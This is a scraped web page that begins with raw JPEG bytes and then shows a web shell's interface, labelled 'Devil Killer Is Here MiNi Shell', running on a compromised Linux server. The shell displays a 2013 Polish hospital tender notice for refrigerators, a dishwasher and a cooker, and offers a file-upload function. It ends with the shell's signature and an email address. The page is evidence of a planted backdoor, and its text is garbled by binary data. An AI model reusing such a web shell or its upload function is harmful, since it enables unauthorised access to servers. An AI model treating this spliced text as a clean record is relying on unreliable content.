JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130418/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130418/154476-N-2013.html

<p class="kh_header"><b>Radom: Zakup i dostawa wyposażenia kuchni dla potrzeb Oddziału Chorób Wewnętrznych z Odcinkiem Gastroenterologii 1 Dnia i Odcinkiem Alergologii Radomskiego Szpitala Specjalistycznego.</b><br>
<b>Numer ogłoszenia: 154476 - 2013; data zamieszczenia: 18.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Radomski Szpital Specjalistyczny im. dr Tytusa Chałubińskiego , ul. Lekarska 4, 26-610 Radom, woj. mazowieckie, tel. 48 3615285, 3615284, faks 48 3615213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa wyposażenia kuchni dla potrzeb Oddziału Chorób Wewnętrznych z Odcinkiem Gastroenterologii 1 Dnia i Odcinkiem Alergologii Radomskiego Szpitala Specjalistycznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup, dostawa i dla części nr 2 i 3 montaż n/w sprzętu:
Część nr 1 - lodówki
I. lodówka do przechowywania krwi - szt. 1
Lp. Parametry wymagane
1. Rok produkcji nie starszy niż 2012
2. Chłodziarki -zamrażarka jednodrzwiowa z zamrażalnikiem
3. Klasa energetyczna A+
4. Całkowita pojemność chłodziarko-zamrażarki netto 120 litrów ? 10 litrów
5. Dwustronny montaż drzwi
6. 2-3 półki chłodziarki  ,regulowane
7. Pojemnik na warzywa
8. Oświetlenie wewnątrz chłodziarki
9. Automatyczne oszranianie
10. Gwarancja min.24 miesiące.
II. lodówka - szt. 1
Lp. Parametry wymagane
1. Rok produkcji nie starszy niż 2012
2. Klasa energetyczna A+
3. W pełni zintegrowana zabudowa z osobno otwieranym zamrażalnikiem
4. Całkowita pojemność chłodziarko-zamrażarki netto 200 litrów ? 10 litrów
5. Dwustronny montaż drzwi
6. 3 - 4 półki chłodziarki  ,regulowane
7. Pojemnik na warzywa
8. Zamrażalnik z 1 półką - 2 szuflady
9. Oświetlenie wewnątrz chłodziarki
10. Automatyczne odszranianie
11. Gwarancja min. 24 miesiące.
III. lodówka do przechowywania leków - szt. 1
Lp. Parametry wymagane
1. Rok produkcji nie starszy niż 2012
2. Pojemność min.350 litrów
3. Wymiary : wysokość min.175 cm, szerokość 60 cm (? 3 cm), głębokość 60 cm (? 3 cm)
4. Witryna jedno lub dwudrzwiowa, min. 8 półek z możliwością zmiany ich ułożenia
5. Szklane drzwi uniwersalne ,z możliwością zmiany prawych na lewe i odwrotnie
6. Zasilanie 230 V,50 Hz
7. Zakres temperatury : +1oC - +12oC
8. Wyświetlacz temperatury, płynna regulacja temperatury
9. Automatyczne odszranianie
10. Oświetlenie wnętrza z włącznikiem
11. Wentylator wyrównujący temperaturę wewnętrzną
12. Gwarancja min.24 miesiące.
Część nr 2 - zmywarka z funkcja wyparzania - 1 szt.
Lp. Parametry wymagane
1. Rok produkcji nie starszy niż 2012
2. Zmywarka na podstawie wykonanej ze stali kwasoodpornej nierdzewnej
3. Przyłącza: elektryczne, wody i odpływu
4. Samoczynna regulacja poziomu wody w komorze mycia i temperatury wody myjącej i płuczącej
5. Temperatura płukania: 85 - 90oC
6. Wydajność : 350 talerzy/h lub więcej
7. Czas zmywania (cykl pracy) - do 3,5 min.
8. Zużycie wody płuczącej : 3-4 dm3/cykl
9. Zasilanie: 230V 50 Hz
10. Wymiary : szerokość 600 mm ? 20 mm, głębokość 610 mm ? 20 mm, wysokość 850 mm ? 20 mm
11. Możliwość używania tabletek i dozowanych płynów do mycia i płukania
12. Kosz uniwersalny do talerzy i innej zastawy
13. Wkład kosza do sztućców + kubki na sztućce
14. Zestaw startowy : płyn do mycia naczyń min. 10 L - płyn do nabłyszczania min.10 L
15. Gwarancja min.24 miesiące.
Część nr 3 - kuchnia elektryczna szt. 1
Lp. Parametry wymagane
1. Rok produkcji nie starszy niż 2012
2. Szerokość płyty 59-60 cm
3. Napięcie zasilania 230V
4. 4 pola grzewcze indukcyjne
5. Sterowanie elektroniczne - dotykowe na płycie grzewczej lub pokrętłami
6. Płyta grzewcza ceramiczna bez ramki
7. Wyświetlanie ustawionej mocy grzania na płycie
8. Blokada przed przypadkowym uruchomieniem
9. Sygnał dźwiękowy końca pracy
10. Timer, minutnik
11. Gwarancja 24 miesiące
12. Instrukcja obsługi w języku polskim.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.71.11.30-9, 39.71.31.00-4, 39.71.13.61-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełniania w/w warunku zostanie dokonana na podstawie oświadczenia potwierdzającego spełnianie warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełniania w/w warunku zostanie dokonana na podstawie oświadczenia potwierdzającego spełnianie warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełniania w/w warunku zostanie dokonana na podstawie oświadczenia potwierdzającego spełnianie warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełniania w/w warunku zostanie dokonana na podstawie oświadczenia potwierdzającego spełnianie warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełniania w/w warunku zostanie dokonana na podstawie oświadczenia potwierdzającego spełnianie warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.) pełnomocnictwo - w oryginale lub w postaci kopii poświadczonej notarialnie,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.radom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych Funduszy Strukturalnych i Zaopatrzenia ul. Lekarska 4 pok. 308 lub 309.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.04.2013 godzina 09:00, miejsce: Dział Zamówień Publicznych Funduszy Strukturalnych i Zaopatrzenia ul. Lekarska 4 pok. 308 lub 309.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> lodówki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. lodówka do przechowywania krwi - szt. 1
Lp. Parametry wymagane
1. Rok produkcji nie starszy niż 2012
2. Chłodziarki -zamrażarka jednodrzwiowa z zamrażalnikiem
3. Klasa energetyczna A+
4. Całkowita pojemność chłodziarko-zamrażarki netto 120 litrów ? 10 litrów
5. Dwustronny montaż drzwi
6. 2-3 półki chłodziarki  ,regulowane
7. Pojemnik na warzywa
8. Oświetlenie wewnątrz chłodziarki
9. Automatyczne oszranianie
10. Gwarancja min.24 miesiące.
II. lodówka - szt. 1
Lp. Parametry wymagane
1. Rok produkcji nie starszy niż 2012
2. Klasa energetyczna A+
3. W pełni zintegrowana zabudowa z osobno otwieranym zamrażalnikiem
4. Całkowita pojemność chłodziarko-zamrażarki netto 200 litrów ? 10 litrów
5. Dwustronny montaż drzwi
6. 3 - 4 półki chłodziarki  ,regulowane
7. Pojemnik na warzywa
8. Zamrażalnik z 1 półką / 2 szuflady
9. Oświetlenie wewnątrz chłodziarki
10. Automatyczne odszranianie
11. Gwarancja min. 24 miesiące.
III. lodówka do przechowywania leków - szt. 1
Lp. Parametry wymagane
1. Rok produkcji nie starszy niż 2012
2. Pojemność min.350 litrów
3. Wymiary : wysokość min.175 cm, szerokość 60 cm (? 3 cm), głębokość 60 cm (? 3 cm)
4. Witryna jedno lub dwudrzwiowa, min. 8 półek z możliwością zmiany ich ułożenia
5. Szklane drzwi uniwersalne ,z możliwością zmiany prawych na lewe i odwrotnie
6. Zasilanie 230 V,50 Hz
7. Zakres temperatury : +1oC - +12oC
8. Wyświetlacz temperatury, płynna regulacja temperatury
9. Automatyczne odszranianie
10. Oświetlenie wnętrza z włącznikiem
11. Wentylator wyrównujący temperaturę wewnętrzną
12. Gwarancja min.24 miesiące..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.71.11.30-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zmywarka z funkcja wyparzania - 1 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp. Parametry wymagane
1. Rok produkcji nie starszy niż 2012
2. Zmywarka na podstawie wykonanej ze stali kwasoodpornej nierdzewnej
3. Przyłącza: elektryczne, wody i odpływu
4. Samoczynna regulacja poziomu wody w komorze mycia i temperatury wody myjącej i płuczącej
5. Temperatura płukania: 85 - 90oC
6. Wydajność : 350 talerzy/h lub więcej
7. Czas zmywania (cykl pracy) - do 3,5 min.
8. Zużycie wody płuczącej : 3-4 dm3/cykl
9. Zasilanie: 230V 50 Hz
10. Wymiary : 
- szerokość 600 mm ? 20 mm
- głębokość 610 mm ? 20 mm
- wysokość 850 mm ? 20 mm
11. Możliwość używania tabletek i dozowanych płynów do mycia i płukania
12. Kosz uniwersalny do talerzy i innej zastawy
13. Wkład kosza do sztućców + kubki na sztućce
14. Zestaw startowy :
- płyn do mycia naczyń min. 10 L - płyn do nabłyszczania min.10 L
15. Gwarancja min.24 miesiące..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.71.31.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> kuchnia elektryczna szt. 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp. Parametry wymagane
1. Rok produkcji nie starszy niż 2012
2. Szerokość płyty 59-60 cm
3. Napięcie zasilania 230V
4. 4 pola grzewcze indukcyjne
5. Sterowanie elektroniczne - dotykowe na płycie grzewczej lub pokrętłami
6. Płyta grzewcza ceramiczna bez ramki
7. Wyświetlanie ustawionej mocy grzania na płycie
8. Blokada przed przypadkowym uruchomieniem
9. Sygnał dźwiękowy końca pracy
10. Timer, minutnik
11. Gwarancja 24 miesiące
12. Instrukcja obsługi w języku polskim.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.71.13.61-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com